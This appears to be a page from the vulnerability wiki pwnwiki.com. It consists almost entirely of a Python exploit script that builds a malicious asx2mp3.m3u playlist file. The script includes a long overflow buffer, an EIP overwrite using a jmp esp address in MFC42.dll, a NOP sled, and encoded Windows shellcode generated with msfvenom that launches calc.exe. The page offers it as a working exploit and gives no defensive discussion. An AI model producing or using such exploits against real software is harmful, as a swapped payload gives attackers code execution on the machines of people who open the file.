PWNWIK.COM
,
EXP
#!/usr/bin/python
import struct
buffer = "A" * 35018
eip = struct.pack('<I', 0x73E66A47) #jmp esp from MFC42.dll
preshellcode = "\x90" * 60
# bad characters: \x00\x0a
# msfvenom -p windows/exec cmd=calc.exe -f c EXITFUNC=seh -e x86/shikata_ga_nai -b "x00x0a" -a x86 --platform windows
shellcode = ("\xb8\xa6\xa4\x36\xae\xd9\xc5\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x31\x31\x43\x13\x83\xeb\xfc\x03\x43\xa9\x46\xc3\x52\x5d\x04"
"\x2c\xab\x9d\x69\xa4\x4e\xac\xa9\xd2\x1b\x9e\x19\x90\x4e\x12"
"\xd1\xf4\x7a\xa1\x97\xd0\x8d\x02\x1d\x07\xa3\x93\x0e\x7b\xa2"
"\x17\x4d\xa8\x04\x26\x9e\xbd\x45\x6f\xc3\x4c\x17\x38\x8f\xe3"
"\x88\x4d\xc5\x3f\x22\x1d\xcb\x47\xd7\xd5\xea\x66\x46\x6e\xb5"
"\xa8\x68\xa3\xcd\xe0\x72\xa0\xe8\xbb\x09\x12\x86\x3d\xd8\x6b"
"\x67\x91\x25\x44\x9a\xeb\x62\x62\x45\x9e\x9a\x91\xf8\x99\x58"
"\xe8\x26\x2f\x7b\x4a\xac\x97\xa7\x6b\x61\x41\x23\x67\xce\x05"
"\x6b\x6b\xd1\xca\x07\x97\x5a\xed\xc7\x1e\x18\xca\xc3\x7b\xfa"
"\x73\x55\x21\xad\x8c\x85\x8a\x12\x29\xcd\x26\x46\x40\x8c\x2c"
"\x99\xd6\xaa\x02\x99\xe8\xb4\x32\xf2\xd9\x3f\xdd\x85\xe5\x95"
"\x9a\x74\x17\x24\x36\xe0\x8e\xdd\x7b\x6c\x31\x08\xbf\x89\xb2"
"\xb9\x3f\x6e\xaa\xcb\x3a\x2a\x6c\x27\x36\x23\x19\x47\xe5\x44"
"\x08\x24\x68\xd7\xd0\x85\x0f\x5f\x72\xda")
with open("asx2mp3.m3u", "w+") as f:
f.write(buffer + eip + preshellcode + shellcode)
print "m3u File Created Successfully\n"
免费、自由、人人可编辑的漏洞库--pwnwiki.com
